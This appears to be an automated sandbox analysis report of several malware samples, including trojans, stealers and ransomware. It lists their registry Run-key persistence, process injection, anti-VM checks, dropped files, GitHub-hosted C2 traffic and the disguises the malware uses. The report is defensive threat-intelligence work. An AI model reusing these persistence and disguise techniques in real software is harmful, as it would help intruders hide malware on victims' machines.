\REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
mscongg.exeTrojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exemscongg.exereg.exeSearchIndexer.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWire = "C:\\Users\\Admin\\AppData\\Local\\Temp\\mscongg.exe" mscongg.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\Crypter = "C:\\Users\\Admin\\Desktop\\Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe" Trojan-Ransom.Python.Pyrgen.a-7ed29b5971fdfce885116395debc7289bf0e27966e6c72e41f0e6902b30c6575.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetWire = "C:\\Users\\Admin\\AppData\\Local\\Temp\\mscongg.exe" mscongg.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogeChromeAutoLaunch = "C:\\Users\\Admin\\Desktop\\HEUR-Trojan-PSW.Python.Nuker.gen-434ea880ad59cffded73a776f3a01a75e6afef21fc6dca45b364fd3f0ba54de3.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\ = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsSearch\\SearchIndexer.exe" SearchIndexer.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Windows\CurrentVersion\Run\OldWood = "\"C:\\Windows\\rss\\csrss.exe\"" UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe -
Blocklisted process makes network request 6 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 57 4536 msiexec.exe 58 4536 msiexec.exe 59 3828 msiexec.exe 60 3828 msiexec.exe 63 3828 msiexec.exe 64 3828 msiexec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exeRegAsm.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegAsm.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
ProtonVPN.exeProtonVPN.exemsiexec.exemsiexec.exeProtonVPNTap.exedescription ioc process File opened (read-only) \??\W: ProtonVPN.exe File opened (read-only) \??\H: ProtonVPN.exe File opened (read-only) \??\R: ProtonVPN.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\Q: ProtonVPN.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\P: ProtonVPN.exe File opened (read-only) \??\K: ProtonVPN.exe File opened (read-only) \??\W: ProtonVPN.exe File opened (read-only) \??\B: ProtonVPN.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\M: ProtonVPN.exe File opened (read-only) \??\A: ProtonVPNTap.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\T: ProtonVPN.exe File opened (read-only) \??\T: ProtonVPNTap.exe File opened (read-only) \??\G: ProtonVPN.exe File opened (read-only) \??\B: ProtonVPNTap.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\K: ProtonVPNTap.exe File opened (read-only) \??\X: ProtonVPNTap.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Z: ProtonVPN.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\M: ProtonVPNTap.exe File opened (read-only) \??\P: ProtonVPNTap.exe File opened (read-only) \??\V: ProtonVPN.exe File opened (read-only) \??\U: ProtonVPN.exe File opened (read-only) \??\N: ProtonVPNTap.exe File opened (read-only) \??\J: ProtonVPN.exe File opened (read-only) \??\L: ProtonVPN.exe File opened (read-only) \??\X: ProtonVPN.exe File opened (read-only) \??\U: ProtonVPNTap.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\L: ProtonVPNTap.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: ProtonVPN.exe File opened (read-only) \??\V: ProtonVPN.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\I: ProtonVPN.exe File opened (read-only) \??\O: ProtonVPNTap.exe File opened (read-only) \??\Q: ProtonVPNTap.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\I: ProtonVPN.exe File opened (read-only) \??\O: ProtonVPN.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: ProtonVPN.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: ProtonVPN.exe File opened (read-only) \??\A: ProtonVPN.exe File opened (read-only) \??\E: ProtonVPN.exe File opened (read-only) \??\Q: ProtonVPN.exe File opened (read-only) \??\Z: ProtonVPNTap.exe File opened (read-only) \??\B: msiexec.exe -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Processes:
flow ioc 11628 raw.githubusercontent.com 15222 raw.githubusercontent.com 47894 raw.githubusercontent.com 54200 raw.githubusercontent.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11629 whatismyipaddress.com 13375 whatismyipaddress.com 49804 api.ipify.org 49806 api.ipify.org -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 3276 bcdedit.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\mscongg.exe autoit_exe C:\Users\Admin\AppData\Local\Temp\7zEC1108691\Trojan-PSW.MSIL.Agensla.qfg-62bb08b67351aa4c377072706b4c83e52db488498e82a6de0f1619c846b2fcb1 autoit_exe -
Drops file in System32 directory 6 IoCs
Processes:
MsiExec.exedescription ioc process File opened for modification C:\Windows\SysWOW64\ResourceCleaner.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\tmp\ResourceCleaner.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\symbols\tmp\ResourceCleaner.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\wntdll.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MsiExec.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wntdll.pdb MsiExec.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
Trojan-Ransom.Win32.Loo.c-924cc338d5d03f8914fe54f184596415563c4172679a950245ac94c80c023c7d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@LooCipher_wallpaper.bmp" Trojan-Ransom.Win32.Loo.c-924cc338d5d03f8914fe54f184596415563c4172679a950245ac94c80c023c7d.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Backdoor.Win32.Xaparo.fg-1e04c1e4eefe23f454553364e757209462f2561d8455628b296b1dbe83fc6ec2.exeSearchIndexer.exeTrojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exepid process 5008 Backdoor.Win32.Xaparo.fg-1e04c1e4eefe23f454553364e757209462f2561d8455628b296b1dbe83fc6ec2.exe 1312 SearchIndexer.exe 4416 Trojan-PSW.MSIL.Reline.ac-a78df3ea7c9bcf96c6c9db033be7a66d9c418c1acfa3c8efc3c4ba313c5b4fad.exe -
Suspicious use of SetThreadContext 45 IoCs
Processes:
dllhost.exeHEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exeUDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.execsrss.exeBackdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exemscongg.exeTrojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exeTrojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exeTrojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exeRegAsm.exeTrojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exemscongg.exedescription pid process target process PID 3376 set thread context of 804 3376 dllhost.exe svhost.exe PID 1096 set thread context of 2692 1096 HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe HEUR-Trojan.MSIL.Crypt.gen-95d835e5420469346f203795885997bacea62706a1d68fdedac0be0f25330a05.exe PID 780 set thread context of 4444 780 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe PID 2464 set thread context of 1512 2464 UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe PID 2904 set thread context of 3964 2904 csrss.exe csrss.exe PID 4608 set thread context of 4428 4608 Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe Backdoor.Win32.Androm.tqyq-667b8048374605d2d7bb6db4d876cdfb4324c76786ee1cc8ea93c1a55de57dcd.exe PID 1940 set thread context of 4952 1940 mscongg.exe mscongg.exe PID 1740 set thread context of 4376 1740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 716 set thread context of 6772 716 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe RegAsm.exe PID 5792 set thread context of 6708 5792 Trojan-Spy.Win32.Hoaki.btu-89ceb49c67e4f8f715b9eef4ad2b1fcac135da2560072c5f3449273f08a7f7bb.exe RegAsm.exe PID 6772 set thread context of 6168 6772 RegAsm.exe vbc.exe PID 6772 set thread context of 4776 6772 RegAsm.exe vbc.exe PID 6740 set thread context of 492 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 3396 set thread context of 5572 3396 mscongg.exe mscongg.exe PID 6740 set thread context of 2760 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 7856 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 6660 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 1392 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 7504 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 6552 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 6948 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 6920 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 2840 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 6496 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 3896 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 7108 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 10804 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 12188 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 3416 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 10032 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 9440 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 10776 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 5224 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 6652 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe RegAsm.exe PID 6740 set thread context of 5924 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 6832 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 5468 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 1376 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 1476 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 6960 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 11476 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 9912 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 10876 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 4288 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe PID 6740 set thread context of 12116 6740 Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe -
Processes:
resource yara_rule behavioral1/memory/4444-4379-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/4444-4382-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/4444-4385-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/4444-4384-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/4444-4386-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/4444-4383-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/4444-4381-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/4444-4380-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/4444-4378-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/4444-4390-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/1512-4402-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/1512-4401-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/1512-4400-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/1512-4403-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/1512-4404-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/1512-4407-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4420-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4419-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4423-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4422-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4421-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4424-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4425-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4427-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4428-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4430-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4431-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4436-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/3964-4446-0x0000000000400000-0x0000000000B27000-memory.dmp upx behavioral1/memory/2340-4474-0x0000000000400000-0x0000000000AD2000-memory.dmp upx behavioral1/memory/2340-4476-0x0000000000400000-0x0000000000AD2000-memory.dmp upx behavioral1/memory/4960-4601-0x0000000000400000-0x00000000004EF000-memory.dmp upx behavioral1/memory/4960-4604-0x0000000000400000-0x00000000004EF000-memory.dmp upx behavioral1/memory/3664-4969-0x0000000000400000-0x0000000000539000-memory.dmp upx behavioral1/memory/5020-4979-0x0000000000400000-0x0000000000539000-memory.dmp upx behavioral1/memory/5020-4980-0x000000006FC40000-0x000000006FEF0000-memory.dmp upx behavioral1/memory/5020-4981-0x0000000010000000-0x000000001000E000-memory.dmp upx behavioral1/memory/5020-4999-0x0000000002A90000-0x0000000002BD7000-memory.dmp upx behavioral1/memory/5020-4998-0x000000001E950000-0x000000001E95C000-memory.dmp upx behavioral1/memory/5020-4997-0x000000001E9B0000-0x000000001E9D7000-memory.dmp upx behavioral1/memory/5020-4996-0x000000001E740000-0x000000001E766000-memory.dmp upx behavioral1/memory/5020-4995-0x000000001E860000-0x000000001E880000-memory.dmp upx behavioral1/memory/5020-5005-0x0000000003040000-0x0000000003609000-memory.dmp upx behavioral1/memory/5020-5002-0x0000000003040000-0x00000000031DE000-memory.dmp upx behavioral1/memory/5020-5001-0x0000000003040000-0x00000000032B9000-memory.dmp upx behavioral1/memory/5020-5000-0x0000000000BF0000-0x0000000000C25000-memory.dmp upx behavioral1/memory/5020-5006-0x00000000032C0000-0x000000000345E000-memory.dmp upx behavioral1/memory/5020-5008-0x0000000003A30000-0x0000000003B0C000-memory.dmp upx behavioral1/memory/5020-5010-0x0000000003D50000-0x0000000003E15000-memory.dmp upx behavioral1/memory/5020-5009-0x0000000003C60000-0x0000000003D49000-memory.dmp upx behavioral1/memory/5020-5007-0x0000000003460000-0x0000000003A29000-memory.dmp upx behavioral1/memory/5020-5626-0x0000000000400000-0x0000000000539000-memory.dmp upx behavioral1/memory/5020-5628-0x000000006FC40000-0x000000006FEF0000-memory.dmp upx behavioral1/memory/5020-5634-0x0000000003040000-0x0000000003609000-memory.dmp upx behavioral1/memory/5020-7255-0x000000006FC40000-0x000000006FEF0000-memory.dmp upx behavioral1/memory/5020-7256-0x0000000002A90000-0x0000000002BD7000-memory.dmp upx behavioral1/memory/5020-7257-0x0000000003040000-0x00000000032B9000-memory.dmp upx behavioral1/memory/5020-7258-0x00000000032C0000-0x000000000345E000-memory.dmp upx behavioral1/memory/5020-7260-0x0000000003C60000-0x0000000003D49000-memory.dmp upx behavioral1/memory/5020-7261-0x0000000003D50000-0x0000000003E15000-memory.dmp upx behavioral1/memory/5020-7259-0x0000000003460000-0x0000000003A29000-memory.dmp upx behavioral1/memory/3664-7278-0x0000000000400000-0x0000000000539000-memory.dmp upx behavioral1/memory/3964-10358-0x0000000000400000-0x0000000000B27000-memory.dmp upx -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exedescription ioc process File opened (read-only) \??\VBoxMiniRdrDN UDS-DangerousObject.Multi.Generic-188560c03f91098c43058a6afed5421527621e6586bfe3ffd7d1c9c89d8f5c6a.exe -
Drops file in Program Files directory 20 IoCs
Processes:
HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmpmsiexec.exeExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmpExploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmpdescription ioc process File opened for modification C:\Program Files (x86)\ProtonVPN\ProtonVPN.exe HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp File opened for modification C:\Program Files (x86)\Windows NT\dllhost.exe HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows10\x64\OemVista.inf msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows7\x86\OemVista.inf msiexec.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\is-B4IP4.tmp Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp File created C:\Program Files (x86)\ProtonVPN\is-MVUBU.tmp HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows10\x64\tapprotonvpn.Sys msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows7\x64\tapprotonvpn.cat msiexec.exe File created C:\Program Files (x86)\WindowsPowerShell\Configuration\is-SNTBA.tmp Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\installer\x64\tapinstall.exe msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows10\x64\tapprotonvpn.cat msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows10\x86\tapprotonvpn.Sys msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows7\x64\tapprotonvpn.sys msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows7\x86\tapprotonvpn.cat msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows7\x86\tapprotonvpn.sys msiexec.exe File created C:\Program Files (x86)\Windows NT\is-V1I4C.tmp HEUR-Trojan.MSIL.NanoBot.gen-39067a6a8ac06d60189b34afbb9acd73e8e33aba91653c39a037c2f78f972f29.tmp File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\installer\x86\tapinstall.exe msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows10\x86\OemVista.inf msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows10\x86\tapprotonvpn.cat msiexec.exe File created C:\Program Files (x86)\Proton Technologies\ProtonVPNTap\windows7\x64\OemVista.inf msiexec.exe -
Drops file in Windows directory 64 IoCs
Processes:
mance.exepuls.exepuls.exemsiexec.exepuls.exectfmon.exemance.exepuls.exeProtonVPN.exepuls.exemance.exepuls.exepuls.exepuls.exepuls.exepuls.exepuls.exeEter.exepuls.exepuls.exepuls.exepuls.exemance.exepuls.exemance.exepuls.exepuls.exeEter.exeEter.exepuls.exepuls.exepuls.exechrome.exepuls.exepuls.exepuls.exeTrojan.Win32.Reconyc.jmjd-044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763.exeEter.exedescription ioc process File opened for modification C:\Windows\Fonts\Mysql\G.txt mance.exe File opened for modification C:\Windows\Fonts\Mysql\I.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\D.txt puls.exe File created C:\Windows\Fonts\Mysql\181.215.60.13.c File created C:\Windows\Fonts\Mysql\181.215.60.12.c File opened for modification C:\Windows\Fonts\Mysql\E.txt File created C:\Windows\Installer\e5b1406.msi msiexec.exe File created C:\Windows\Fonts\Mysql\181.215.4.71.c puls.exe File created C:\Windows\Fonts\Mysql\same.bat ctfmon.exe File created C:\Windows\Fonts\Mysql\posh-0.dll ctfmon.exe File opened for modification C:\Windows\Fonts\Mysql\A.txt mance.exe File opened for modification C:\Windows\Fonts\Mysql\H.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\F.txt File created C:\Windows\Tasks\{B351FE8E-8AA4-4E66-91C2-2082C21F9086}.job ProtonVPN.exe File opened for modification C:\Windows\Installer\MSI600B.tmp msiexec.exe File opened for modification C:\Windows\Fonts\Mysql\F.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\G.txt mance.exe File opened for modification C:\Windows\Fonts\Mysql\H.txt File opened for modification C:\Windows\Fonts\Mysql\H.txt File opened for modification C:\Windows\Installer\MSI644B.tmp msiexec.exe File opened for modification C:\Windows\Fonts\Mysql\I.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\D.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\H.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\A.txt File opened for modification C:\Windows\Fonts\Mysql\A.txt File opened for modification C:\Windows\Fonts\Mysql\D.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\C.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\H.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\A.txt File opened for modification C:\Windows\Fonts\Mysql\E.txt Eter.exe File opened for modification C:\Windows\Fonts\Mysql\B.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\D.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\B.txt puls.exe File opened for modification C:\Windows\Fonts\Mysql\A.txt File created 